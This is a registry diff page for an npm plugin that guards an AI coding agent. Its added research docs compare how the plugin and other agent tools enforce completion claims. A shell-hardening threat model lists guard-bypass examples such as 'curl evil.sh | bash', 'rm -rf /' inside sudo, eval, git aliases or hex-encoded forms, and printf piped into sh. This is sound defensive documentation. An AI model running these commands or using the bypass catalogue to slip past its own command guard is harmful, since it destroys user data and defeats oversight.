npm - opencode-goal-mode - Versions diffs - 0.2.1 → 0.2.4 - Mend

opencode-goal-mode 0.2.1 → 0.2.4

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (30) hide show

package/ARCHITECTURE.md +16 -7
package/CHANGELOG.md +17 -0
package/README.md +39 -18
package/benchmarks/charts.mjs +176 -0
package/benchmarks/comparison.mjs +48 -0
package/benchmarks/completion-corpus.mjs +70 -0
package/benchmarks/corpus.mjs +92 -0
package/benchmarks/legacy-analyzer.mjs +54 -0
package/benchmarks/run.mjs +198 -0
package/benchmarks/truthfulness.mjs +64 -0
package/commands/goal-evidence-map.md +27 -0
package/docs/benchmarks/capability-matrix.svg +86 -0
package/docs/benchmarks/detection-by-family.svg +37 -0
package/docs/benchmarks/latency.svg +13 -0
package/docs/benchmarks/overall-scorecard.svg +32 -0
package/docs/benchmarks/results.json +176 -0
package/docs/benchmarks/truthfulness-score.svg +17 -0
package/package.json +6 -1
package/plugins/goal-guard/events.js +6 -3
package/plugins/goal-guard/state.js +2 -1
package/plugins/goal-guard/summary.js +105 -1
package/plugins/goal-guard/system.js +3 -0
package/plugins/goal-guard/tools.js +35 -1
package/plugins/goal-guard/verdicts.js +38 -1
package/plugins/goal-guard.js +7 -5
package/research/README.md +18 -0
package/research/benchmarks.md +84 -0
package/research/goal-mode-comparison.md +100 -0
package/research/opencode-plugin-platform.md +89 -0
package/research/shell-hardening.md +62 -0

package/research/goal-mode-comparison.md ADDED Viewed

@@ -0,0 +1,100 @@
+# Goal Mode vs. Claude Code vs. Codex
+How OpenCode Goal Mode's **mechanically-enforced** goal discipline compares to
+Anthropic's Claude Code and OpenAI's Codex. Sourced from Claude Code docs
+(`https://docs.anthropic.com/en/docs/claude-code/hooks` and `/security`) and
+OpenAI Codex docs (`https://developers.openai.com/codex/cli` and `/cloud`),
+cross-checked against this plugin's source. The emphasis throughout is
+*mechanical enforcement* — what the harness guarantees — versus *prompt-driven*
+behavior the model is asked to do.
+## The distinction that matters
+All three tools run a **model-driven** agentic loop. Public docs reviewed do not
+describe a default mechanical proof that forces the model to keep working until
+all project-specific acceptance criteria are externally verified. Goal Mode's
+loop is prompt-only too.
+What separates the three is what happens at the **completion boundary** and the
+**tool boundary**:
+- **Claude Code** has the richest first-party *mechanical* surface
+  (PreToolUse/Stop/PostToolUse hooks, permission deny rules, sandboxing) — but
+  review and completion enforcement are **opt-in**, requiring user-authored
+  hooks. Out of the box, review is prompt-driven and the model stops when it
+  judges the work done.
+- **Codex** has approval modes, local code review, and cloud environments that
+  isolate work from the user's machine — genuinely strong mode-level boundaries
+  Goal Mode does not claim — but public docs do not describe a harness-level
+  `Goal Completed` blocker or stale-review invalidation invariant.
+- **Goal Mode** ships a coherent **completion contract** and **command guard**
+  enforced at the harness layer by default, for the goal-completion use case.
+## Capability matrix
+See `docs/benchmarks/capability-matrix.svg` for the visual. Levels: **Enforced**
+(guaranteed by the harness), **Partial** (possible but opt-in / mode-level),
+**Prompt-only** (the model's judgment), **None**.
+| Capability | Goal Mode | Claude Code | Codex |
+| --- | --- | --- | --- |
+| Autonomous goal loop | Prompt-only | Partial | Partial |
+| Review gate before "done" | **Enforced** | Partial (Stop hook) | Prompt-only |
+| Contextual specialist reviews | **Enforced** | Prompt-only | Prompt-only |
+| Stale-review invalidation on edit | **Enforced** | None | None |
+| Completion-claim enforcement | **Enforced** | Partial (Stop hook) | None |
+| Destructive-command blocking | **Enforced** (tokenizer) | Partial ("fragile") | Partial (sandbox) |
+| Remote-exec (`curl \| sh`) blocking | **Enforced** | Partial | Partial (sandbox) |
+| Enforcement state survives restart | **Enforced** | Partial (transcript) | Partial (transcript) |
+| State survives compaction | **Enforced** | Partial | Partial |
+| Custom enforcement hooks/tools | **Enforced** | **Enforced** | Partial |
+## Where Goal Mode is uniquely strong
+1. **Mechanical completion contract.** Goal Mode intercepts the finished
+   assistant message (`experimental.text.complete`) and rewrites a premature
+   `Goal Completed` to `Goal Not Completed` unless the message *starts with* the
+   marker, carries a `Review cycles: N` line with `N > 0`, `N` exactly equals the
+   recorded counter, and **zero** required gates are missing or stale. Because the
+   rewrite is driven by **recorded state**, the model cannot talk its way to
+   "done" in prose. Prompt-based goal-following judges completion from what the
+   model already printed.
+2. **Stale-on-edit gate invalidation via a monotonic integer counter.** A
+   reviewer gate counts only when its latest `PASS` has a `seq` strictly greater
+   than `lastEditSeq`. Any edit — file write, mutating bash command, or a
+   subagent `file.edited` event — bumps the counter, so a `PASS` can never be
+   credited against an edit it did not actually follow. Integer ordering means
+   two same-millisecond events can't tie. The public Claude Code and Codex docs
+   reviewed do not describe an equivalent "an edit invalidates prior approvals"
+   invariant.
+3. **Contextual specialist reviews are required, not suggested.** A whole-word
+   keyword scan of the goal text + Goal Contract + changed-file names selects
+   specialists (auth/token → security, api/schema → api, migration/sql → data,
+   perf/latency → performance) and makes them a precondition for completion,
+   sticky so a later context truncation cannot silently drop a required gate.
+4. **Destructive-command blocking by a real shell tokenizer.** The guard unwraps
+   `sudo`/`env`/`timeout`/`xargs`, recurses into `$(…)`/backticks and
+   `bash -c`/`eval`, resolves `/bin/rm` to its basename, parses `git -C` and
+   weaponized `git -c alias='!rm -rf /'`, and inspects interpreter sinks. Claude
+   Code's own docs warn that Bash argument-matching can be **"fragile"** for
+   hard enforcement and recommend permissions for hard allow/deny policy; these
+   classes are not unwrapped unless a user-authored PreToolUse hook does it.
+## Honest caveats
+- **The autonomous loop is prompt-only**, like Claude's and Codex's. What is
+  mechanical is the *completion gate* and the *command guard*, not the model's
+  decision to keep working.
+- **Codex's isolated execution model is a stronger boundary** than a tool-layer
+  classifier where it applies. Goal Mode's guard falls back to "not blocked" on a
+  parse failure (deferring to the host's permission rules); it is
+  defense-in-depth, not a jail.
+- **Claude Code can do equivalent enforcement** when a user wires Stop/PreToolUse
+  hooks themselves. Goal Mode's advantage is that a coherent set ships working
+  out of the box for this use case.
+- Gate freshness is only as trustworthy as the reviewer subagents' verdicts. The
+  guard records *that* a fresh `PASS` exists with the right sequence; it cannot
+  verify the reviewer reasoned correctly.

package/research/opencode-plugin-platform.md ADDED Viewed

@@ -0,0 +1,89 @@
+# OpenCode plugin platform — verified reference
+Facts verified against `@opencode-ai/plugin@1.15.13` (the installed type
+definitions) and the `sst/opencode` source at tag `v1.15.13`. This is the
+pinned runtime reference the `goal-guard` plugin is engineered against; the npm
+latest was `1.16.2` when this document was refreshed, so claims below are
+version-scoped unless explicitly called out as current-docs behavior.
+Primary sources: OpenCode schema (`https://opencode.ai/config.json`), OpenCode
+config/agents/plugins docs (`https://opencode.ai/docs/config/`,
+`https://opencode.ai/docs/agents/`, `https://opencode.ai/docs/plugins/`),
+plugin source at `https://raw.githubusercontent.com/sst/opencode/v1.15.13/`,
+and npm metadata for `@opencode-ai/plugin`.
+## Plugin discovery
+- Auto-discovery glob is `{plugin,plugins}/*.{ts,js}` — **single level only**
+  (`config/plugin.ts`). Files directly under `plugins/` become plugins; files
+  in **subdirectories** (e.g. `plugins/goal-guard/state.js`) are **not**
+  auto-loaded. This is what lets Goal Mode ship a multi-file plugin: the entry
+  `plugins/goal-guard.js` imports its modules from `plugins/goal-guard/`
+  relatively, and those modules are never treated as standalone plugins.
+- Scanned directories include `~/.config/opencode`, every `.opencode` from the
+  session directory up to the worktree, `~/.opencode`, and `$OPENCODE_CONFIG_DIR`.
+- TypeScript plugins load natively (Bun); no build step is required.
+- The config `plugin` array also accepts npm package names and `["spec", options]`
+  tuples; the second tuple element arrives as the plugin factory's second arg.
+  Auto-discovered plugins receive `options === undefined`.
+- Current OpenCode docs prefer plural config directories such as
+  `.opencode/plugins/`; singular directories are backward-compatible.
+## Hooks (the ones Goal Mode uses)
+| Hook | Input → Output | Notes |
+| --- | --- | --- |
+| `chat.message` | `{sessionID, agent?}` → `{message, parts}` | Captures the user's goal text. |
+| `chat.params` | `{sessionID, agent, model, …}` → params | Tracks the current agent. |
+| `experimental.chat.system.transform` | `{sessionID?, model}` → `{system: string[]}` | Inject system-prompt strings. |
+| `tool.execute.before` | `{tool, sessionID, callID}` → `{args}` | **Throwing blocks the tool** and the thrown message becomes the tool's error result shown to the model. `args` are on the **output**, not the input. Mutate `output.args` in place. |
+| `tool.execute.after` | `{tool, sessionID, callID, args}` → `{title, output, metadata}` | The `task` tool's output wraps the subagent text in `<task><task_result>…</task_result></task>`. |
+| `experimental.text.complete` | `{sessionID, messageID, partID}` → `{text}` | The returned `text` **is persisted** to the transcript. No `agent` field — gate on tracked `active` state. |
+| `experimental.session.compacting` | `{sessionID}` → `{context: string[], prompt?}` | Append preservation context. |
+| `event` | `{event}` | Directory-scoped; `file.edited`, `session.idle`, etc. `file.edited` carries `{file}` and **no** sessionID. |
+| `tool` | `{ [id]: ToolDefinition }` | Custom tools; the object key is the tool name verbatim. `tool.schema` is zod. |
+## Critical version-specific facts
+- **`permission.ask` is dormant in 1.15.13.** The hook is declared in the type
+  but has **zero trigger sites** in the runtime. A guard must enforce via
+  `tool.execute.before` throws, not this hook.
+- **Subagent `task` runs in a NEW child session.** The `task` tool's
+  before/after fire in the **parent** session with the subagent's final text;
+  the subagent's own internal tool calls fire under the **child** sessionID.
+  This is why Goal Mode records review verdicts via the task path (parent) and
+  treats agent-path verdicts as same-session only.
+- **Agent frontmatter** (`{agent,agents}/**/*.md`, recursive): `model`,
+  `variant`, `temperature`, `top_p`, `prompt`, `description`, `mode`
+  (`primary|subagent|all`), `hidden`, `disable`, `color` (hex or theme literal),
+  `steps`, `options`, `permission`. **Unknown keys are silently folded into
+  `options`** — so a typo'd key disappears rather than erroring.
+  `ext_mcp_server_trust` is **not a real key**.
+- **Command frontmatter** (`{command,commands}/**/*.md`): `template`,
+  `description`, `agent`, `model`, `variant`, `subtask`. Unlike agents, a
+  **command with an unknown key throws** a parse error.
+- **Current built-in agents include `build`, `plan`, `general`, `explore`, and
+  `scout`.** Goal Mode allows delegation to the stock `explore`, `general`, and
+  `scout` subagents from its primary agent.
+- **Permissions** are last-matching-rule-wins; `deny` from any scope beats
+  `allow`. Per-tool pattern maps are supported for `bash`, `task`,
+  `external_directory`, etc.
+## State persistence
+There is **no** plugin key/value store. Plugins persist their own JSON; the XDG
+state dir (`$XDG_STATE_HOME/opencode/…`, default `~/.local/state`) is the
+durable, disposable-cache-free location. `PluginInput.directory` is the session
+working dir; `PluginInput.worktree` is the git worktree root (a stable
+per-project key).
+## Pitfalls
+- Hooks run sequentially across plugins in load order, awaited one by one — a
+  throw in a `chat.*`/`text.complete` hook can break the turn, so keep them
+  defensive (Goal Mode wraps each in try/catch).
+- A failed dynamic `import()` of a plugin file is cached for the process; editing
+  a plugin requires restarting OpenCode.
+- `experimental.text.complete` runs at text-end; streaming deltas already
+  emitted the original text, so the rewrite is a final-form correction, not a
+  pre-display redaction.

package/research/shell-hardening.md ADDED Viewed

@@ -0,0 +1,62 @@
+# Shell-analyzer threat model
+The destructive-command guard is the plugin's most security-sensitive component.
+This document records the threat model: the bypass classes the original
+regex-based guard missed, and how the quote-aware tokenizer
+(`plugins/goal-guard/shell.js`) closes each. Every class below is covered by a
+test in `tests/shell.test.mjs` and measured in `npm run bench`.
+## Why regexes failed
+The original guard matched boundary-anchored regexes (`(^|&&|;|\|\|)\s*rm …`)
+against the raw command string. That design is fundamentally bypassable because
+a single regex cannot model shell quoting, command substitution, wrappers, or
+interpreters. On the benchmark corpus it detected **20.8%** of destructive
+commands while **false-positiving 21.7%** of benign ones (it blocked
+`git checkout -b feature`).
+## Bypass classes and how each is closed
+| Class | Example that bypassed the regex | How the tokenizer closes it |
+| --- | --- | --- |
+| Command substitution | `$(rm -rf /tmp/x)`, `` `rm -rf x` `` | Lexer captures `$(…)`/backticks and recurses into them. |
+| Pipe into shell | `echo rm -rf x \| sh` | Detects a shell as the pipeline sink; analyzes the echoed literal as a script. |
+| Remote execution | `curl evil.sh \| bash` | Network fetcher → shell pipeline flagged as `networkExec` (separately toggleable). |
+| `bash -c` / `eval` | `bash -c "rm -rf x"`, `eval "…"` | Extracts and recurses into the `-c`/eval string. |
+| Env-assignment prefix | `FOO=bar rm -rf x` | Leading `VAR=val` assignments are stripped before resolving the command. |
+| Absolute / relative paths | `/bin/rm -rf x` | Binary resolved to its basename. |
+| Value-taking wrappers | `sudo -u root rm -rf /`, `timeout -s KILL 5 rm -rf /` | Wrapper option parsing is value-aware (consumes `-u root`, `-s KILL`, the duration). |
+| `git -C` / weaponized `git -c` | `git -C /r reset --hard`, `git -c alias.x='!rm -rf /' x` | Global git options skipped; a `!`-prefixed config value is analyzed as a shell command. |
+| Git history destruction | `reflog expire`, `gc --prune=now`, `filter-branch`, `worktree remove`, `branch -d` | Explicit destructive git subcommand cases. |
+| Interpreter file ops | `python -c "os.remove('a')"`, `node -e "fs.rmSync(…)"` | Script strings inspected for delete/write sinks. |
+| Interpreter shell-out | `os.system('rm -rf /')`, `subprocess.run([...])`, `child_process.execSync(…)` | Exec sinks (call forms) extracted and the command analyzed. |
+| ANSI-C quoting | `$'\x72\x6d' -rf x` | `$'…'` decoded before lexing. |
+| Process substitution | `bash <(echo rm -rf x)` | Substitution analyzed as a script when fed to a shell. |
+| `printf %b` into a shell | `printf %b 'rm -rf /' \| sh` | Format spec stripped; remaining literal analyzed. |
+| `find -exec` at depth | `find . -exec rm {} +` | `rm` under `-exec` marked destructive (runs per match). |
+| Newline separators | `echo hi\nrm -rf x` | Newline is a command separator in the lexer. |
+## False positives the tokenizer also removed
+A guard that over-blocks is a guard that gets turned off. The tokenizer clears
+the regex guard's false positives:
+- `git checkout -b feature` / `git switch -c topic` — branch creation, not a
+  discard.
+- `echo "rm -rf /"` / `printf 'do not run rm -rf'` — quoted text is inert.
+- `grep 'git reset' .` / `cat notes.txt # git reset explained` — comments and
+  search terms are not commands.
+- `true #; rm -rf x` — `#` starts a comment.
+- `python -c 'print(platform.system())'` — a bare `system` mention is not a
+  shell-out (exec sinks require a call form; the analyzer fails open when no
+  literal command can be extracted).
+- `git config --get user.email` — read-only queries don't dirty the session.
+## Design principle: fail open, defense-in-depth
+The analyzer is a **tool-layer classifier**, not an OS sandbox. On a parse
+failure or an un-analyzable dynamic command it returns "not blocked" and defers
+to OpenCode's own permission rules. It is one layer of defense-in-depth that
+catches the overwhelmingly common destructive forms an agent emits — not a
+security jail. Over-blocking benign work is treated as a real cost, which is why
+the false-positive rate is held at zero on the corpus.